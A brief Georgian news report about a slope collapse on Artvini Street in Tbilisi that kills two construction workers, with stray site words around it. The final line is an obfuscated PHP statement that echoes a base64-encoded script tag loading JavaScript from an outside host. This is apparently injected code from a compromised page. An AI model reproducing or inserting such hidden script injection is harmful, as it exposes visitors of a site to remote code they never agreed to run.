celsiusi
ავერსი საქკაბელი

თბილისში, ართვინის ქუჩაზე კედლის მოწყობის სამუშაოების დროს ფერდობი ჩამოიშალა, რასაც ორი ადამიანი ემსხვერპლა.

როგორც საინფორმაციო სააგენტო "ბიზნესთაიმს" დედაქალაქის მერიაში განუცხადეს, ართვინის ქუჩა N67-ში, ჩუღურეთის რაიონის გამგეობის დაკვეთით,  კომპანია „ოუ ნი“ ასრულებდა გრუნტის დამჭერი კედლის მოწყობის სამუშაოებს, რა დროსაც ჩამოიშალა ავარიული ფერდობის მასა და მოიყოლა კომპანიის ორი თანამშრომელი. 

თბილისის მერიაში აღნიშნავენ, რომ მომხდარ ფაქტზე დაწყებულია გამოძიება, რომელიც დაადგენს, რა იყო გამომწვევი ფაქტრორი რამაც განაპირობა ფერდის ჩამოშლა.

432
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");